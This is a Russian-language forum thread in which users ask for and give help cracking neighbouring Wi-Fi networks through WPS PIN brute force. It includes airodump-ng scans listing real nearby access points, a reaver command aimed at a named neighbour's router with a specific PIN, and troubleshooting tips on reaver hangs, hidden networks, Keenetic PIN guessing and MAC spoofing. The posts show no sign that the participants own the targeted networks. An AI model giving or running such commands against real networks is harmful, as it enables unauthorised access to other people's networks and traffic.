Вся проблема в том что он не показывает точки которые можно отковырять no \ yes sadam@K52JU:~$ sudo su [sudo] password for sadam: root@K52JU:/home/sadam# airmon-ng Interface Chipset Driver wlan0 Atheros ath9k - [phy0] root@K52JU:/home/sadam# airmon-ng start wlan0 Found 5 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 690 avahi-daemon 696 avahi-daemon 707 NetworkManager 769 wpa_supplicant 1046 dhclient Process with PID 1046 (dhclient) is running on interface wlan0 Interface Chipset Driver wlan0 Atheros ath9k - [phy0] (monitor mode enabled on mon0) root@K52JU:/home/sadam# airodump-ng mon0 CH -1 ][ Elapsed: 52 s ][ 2014-01-05 18:21 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 64:70:02:70:58:1A -61 1 0 0 10 54e. WPA2 CCMP PSK TP-LINK TL-WR941ND 14A:E9:F2:2D:7C -53 0 0 0 1 54e WPA2 CCMP PSK shout CC:5D:4E:5B:AA:1A -73 1 0 0 1 54e WPA2 CCMP PSK SkyNet199 BC:F6:85:C8:6A:80 -84 413 12 0 6 54e. WPA2 CCMP PSK Gary_40k 00:1C:F0:AF:6E:F7 -89 410 0 0 6 54 . WPA2 TKIP PSK homenet 54:04:A6:5B:FD:1C -36 490 1391 9 6 54e WPA2 CCMP PSK ASUS 00:26:18:C5:F5:BA -1 0 0 0 133 -1 <length: 0> BSSID STATION PWR Rate Lost Packets Probes (not associated) F0:CB:A1:93:7B:02 -81 0 - 1 0 3 (not associated) E0:06:E6:8D:B5:43 -84 0 - 1 0 1 (not associated) 58:55:CAF:8B:27 -84 0 - 1 0 3 (not associated) E8:8D:28:2C:9A:4F -86 0 - 1 0 2 shout (not associated) 00:0A:00:18:4B:0E -89 0 - 1 0 1 BC:F6:85:C8:6A:80 00:AA:70:7A7:54 -1 1e- 0 0 1 BC:F6:85:C8:6A:80 BC:C6B:6E:45:52 -87 1e- 6 0 4 54:04:A6:5B:FD:1C E0:B9:A5:7F:A9:FA 0 0e- 0 0 73 54:04:A6:5B:FD:1C 00:11:E1D:B0:3E -59 0e- 1 0 15 54:04:A6:5B:FD:1C B8:B4:2E:3F:24:A4 -127 0e- 0e 0 1295 00:26:18:C5:F5:BA 50:01:BB:28:C0:31 -80 0 - 1 0 553 V_88_A,tele2,rnet122 00:26:18:C5:F5:BA 50:01:BB:28:C0:31 -80 0 - 1 0 553 V_88_A,tele2,rnet122 root@K52JU:/home/sadam# wash -i mon0 -s 1000 Wash v1.4 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> BSSID Channel RSSI WPS Version WPS Locked ESSID --------------------------------------------------------------------------------------------------------------- При проверке интерфейсов выдает : root@K52JU:/home/sadam# iwconfig mon0 IEEE 802.11bgn Mode:Monitor Tx-Power=15 dBm Retry long limit:7 RTS thrff Fragment thrff Power Managementff eth0 no wireless extensions. lo no wireless extensions. wlan0 IEEE 802.11bgn ESSIDff/any Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm Retry long limit:7 RTS thrff Fragment thrff Encryption keyff Power Managementff
Так... точки в эфире есть, но wash их не показывает. Скорее всего, просто нет точек в эфире со включённым WPS.
Но по идее wash должен показать что не взломать их . Опять же по идее какую то информацию должен дать
Насколько я понял работу wash, она показывает только точки с включенным wps и иногда некоторые точки с включенным, но залоченным wps (Locked Yes). Точки без wps не показывает вообще. Информация о статусе wps приходит с beacon от точек и потому легко сортируется (да и само название утилиты красноречиво говорит о её назначении - очистить список от ненужных точек).
Жаль, я понял. а не подскажите методы или сылки на статью чтоб расмотреть еще вариант какой нибудь как можно еще пройти ?
Попробуй добыть пароль в наиболее вероятном (на wps) месте в твоем эфире. Если и там wps отключен, то нужно будет ловить хендшейки и искать по словарям. Может быть будет лучше пробовать отключившись от и-нета. Две команды: airmon-ng start wlan0 reaver -i mon0 -b CC:5D:4E:5B:AA:1A -p 6007322 -S -vv Есть надежда, что получишь ты PSK от этой точки, хотя кто его знает, этого SkyNet199...
Добрый день Хотел бы спросить, можно ли у ZyXEL Keenetic II находить WPS пин так же как у старых ZyXEL Keenetic (16 -> 10)? А то я пробовал, доходило до M6 а потом обрывалось и впс отрубался. Заранее спасибо
Поддержу comporg: M6 - хороший признак, к тому же у меня уже были удачи (16-10) именно с II и II Lite, так что Keenetic продолжается. А обрыв - может помеха связи или там что-то настраивали или просто сигнал слишком слабый. Думаю через какое-то время все будет ОК.
Сделал так, подключился, лазил,лазил в свойствах адаптера так пас и не увидел у меня Виста может из за этого. А утром сетки не увидел в эфире((( Может кто подскажет как найти пас в таких дефектных сетках!
Подскажите кто если в курсе. Начинаю перебор пинов на некоторых точках, запускаю как: reaver -i mon0 -b MAC -vv он начинает у целевой точки перебирать каналы, а когда находит, просто останавливается и больше ничего не происходит. На других точках почти тоже самое за исключением одного момента, он выводит всего 1 строку или "успешная ассоциация мака с essid" или наоборот "не удалось ассоциировать точку с essid" после этого так же ничего не происходит вообще, как будто зависание, ждал до 20 минут, всё бестолку. А точки нужные, как быть?
Спс, тоже приму к сведению, хотя показывает у большинства сигнал 50 а то и ниже. те что выше 60 я даже не беру в расчет. Сигнал попробую усилить направленной антеной... может быть ещё какие рекомендации будут? особенно в опциональном плане reaver
Отчасти похоже на слабый сигнал. Чтобы исключить - поднимите точку доступа в метре от себя с включенным wps и проверьте. У меня был схожий случай. Виной всему был адаптер, который в принципе не умел работать с измененными маками. За десяток лет практики - это первый такой, который я увидел вживую. Попробуйте использовать другой адаптер, этот, быть может, просто старый. Если меняете мак - попробуйте не менять. Последний вариант - сама система. Проверьте на других гарантированно рабочих. Kali или винда со стоковыми дровами от производителя. А еще лучше - название модели в студию.
Подскажите как извлечь PIN для скрытой сети: MAC точки есть, № канала есть, даже название скрытой сети есть, ввожу все параметры в командной строке и тишина ...
Там ZyXEL, с ним проблем с подборам пина нет, имею ввиду блокировки точки и зависания, Bully да упустил из виду, попробую.
Для keenetic onmi появилась новая прошивка. В списке улучшений - "Усилена устойчивость WPS к атакам". Я попробовал на ней reaver - пароль не отдала, залочилась с первого же пина, заведомо правильного. Утилита от awus036h не может к ней подключится по пину, но и не лочит ее. Для некоторых других моделей то же появились прошивки с аналогичным описанием и датой релиза